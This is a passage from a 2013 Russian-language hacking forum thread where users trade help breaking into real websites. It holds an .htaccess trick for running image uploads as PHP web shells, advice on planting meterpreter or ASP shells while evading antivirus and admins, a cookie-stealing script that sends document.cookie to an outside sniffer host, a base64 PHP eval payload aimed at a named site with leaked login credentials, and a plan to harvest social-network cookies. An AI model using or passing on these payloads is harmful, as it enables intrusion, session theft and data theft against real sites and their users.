Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    нажимаешь на index.php и редактируешь
     
  2. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    sunic

    то, что сломался дизайн - это еще не признак того, что файл не загрузило. Я бы попробовал залить простую картинку и посмотреть пути к ней, а потом php. Может быть так что в папке куда скрипт сохраняет изображения нет прав на выполнение скриптов тогда поможет загрузка туда же файла .htaccess такого содержания

    PHP:
    AddType application/x-httpd-php .jpg  
    AddHandler application
    /x-httpd-php .jpg
    шелл заливается с расширением jpg
     
  3. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    /////
     
    #22643 cyborgx, 22 Oct 2013
    Last edited: 30 Oct 2013
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ща напрегу свои екстрасенсорные способности и скажу... yfdthyj

    порутать сервак

    сам пониаешь что спрашиваешь?

    да, там пот кодом который редактируешь есть кнопка save!!!!
    неужели так сложно разуть глаза и если что-то непонятно то методом тыка попробовать?
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Может вам это поможет?!
    https://forum.antichat.ru/showpost.php?p=3382514&postcount=1
     
    _________________________
    #22645 winstrool, 23 Oct 2013
    Last edited: 23 Oct 2013
  6. xdzolax

    xdzolax New Member

    Joined:
    15 May 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    посоветуйте куда копать. получил доступ к cmd через microsoft sql. но сервер очень медленный (вывод результата любой команды занимет часы, а если инфы много, то может занять и дни), сервер тормознутый, а бд очень большие.
    цель пока что - слить бд.
    что приходит в голову:
    1. создать файл, и вставить в него код какого-либо шелла. но как узнать диру, куда заливать, чтобы запустить шелл из веба (пробовал для этого найти ошибки в asp, не получилось).
    2. пытаться создать пользователя с админ права, открыть нужный порт и коннектиться к серву удаленно.
    3. пытаться залить реверс-шелл (meterpreter) и работать с ним.

    в каком направлении вы бы посоветовали двигаться? важно, чтобы шанс быть спаленым av или админом был минимальным.

    инфа о системе - ASP.NET, Microsoft IIS 7.5, Server 2008.
     
  7. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    xdzolax

    ищи админку, заливай asp(лучше на VisualScript написанном) шелл или пробуй через скулю использовать meterpremer, шелл аналогично asp, с путями куда разрешена запись придется экспериментировать(к примеру C:\Windows\Temp)

    как то так
     
  8. Brooklyn111

    Brooklyn111 New Member

    Joined:
    13 Feb 2011
    Messages:
    51
    Likes Received:
    0
    Reputations:
    0
    посоветуйте пожалуйста, ситуация такая, есть проект, в нем найдена уязвимость Remote Code (PHP) Evaluation, [​IMG] предполагаю, что возможно вместо этого кода внести шелл код, форма ввода на странице [​IMG]
    объясните пожалуйста какой код, как, и куда его можно вставить для внедрения шелла.
    заранее благодарен!
     
    #22648 Brooklyn111, 24 Oct 2013
    Last edited: 24 Oct 2013
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Мелкие изображения. Залей на ФО и дай ссылку.
     
    _________________________
  10. Brooklyn111

    Brooklyn111 New Member

    Joined:
    13 Feb 2011
    Messages:
    51
    Likes Received:
    0
    Reputations:
    0
    http://www.sendspace.com/filegroup/W5fLL1KrrODv2bgPBU44mg
     
  11. djhovo09

    djhovo09 New Member

    Joined:
    2 Jul 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене

    [/QUOTE]<iframe name="ffff" src=http://snifer.ejan.ru/index.php/></iframe>
    <script>
    img.src="http://snifer.ejan.ru/img.php?"+document.cookie;
    </script>
     
  12. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    всем привет,у меня вот такой вопрос есть сайт site.ru/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4==&cmd=phpinfo();
    как я понял есть локальный инклуд ,но вот как дальше ./../../ так не пролазиет ,если кодировать в base64 ,то просто вверу сайта выводится ./../../ сколько бы не вводил
     
  13. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Или даже так http://go.jetswap.com/account?mode=data:;base64,PD9waHAgcGhwaW5mbygpPz4= только нужна авторизация на сайте
    вот логин пароль
    japan68 261268
     
  14. djhovo09

    djhovo09 New Member

    Joined:
    2 Jul 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене

    [/QUOTE]<iframe name="ffff" src=http://snifer.ejan.ru/index.php/></iframe>
    <script>
    img.src="http://snifer.ejan.ru/img.php?"+document.cookie;
    </script>
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ахренеть)) спс чувак за шелл на таком офигенном проекте)) где ты эту ссыль взял? скажи честно))
     
  16. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0

    Я его уже ломал пару раз только через SQl ну вот с инклуде я не дружу
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Подарил людям счастье 58к трафа и тиц 250 PR3, + реверс в добавок, теперь начинается шоу программ "Остаться в живых" :D
     
    _________________________
  18. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    :) не жалко ,только на вопрос мне так и не ответили ,некогда однако :)
     
    1 person likes this.
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    скрипт должен встовляться в тело ломаемой страници, а не там куда ссылается фреем, если можешь вставить фреем в тело страници, значит сможешь вставить и скрипт.
     
    _________________________
  20. djhovo09

    djhovo09 New Member

    Joined:
    2 Jul 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер

    <div id="ok_group_widget"></div>
    <script>
    !function (d, id, did, st) {
    var js = d.createElement("script");
    js.src = "http://snifer.ejan.ru/connect.js";
    js.onload = js.onreadystatechange = function () {
    if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
    this.executed = true;
    setTimeout(function () {
    OK.CONNECT.insertGroupWidget(id,did,st);
    }, 0);
    }
    }}
    d.documentElement.appendChild(js);
    }(document,"ok_group_widget","52864984219766","{width:250,height:335}");


    </script>
     
Thread Status:
Not open for further replies.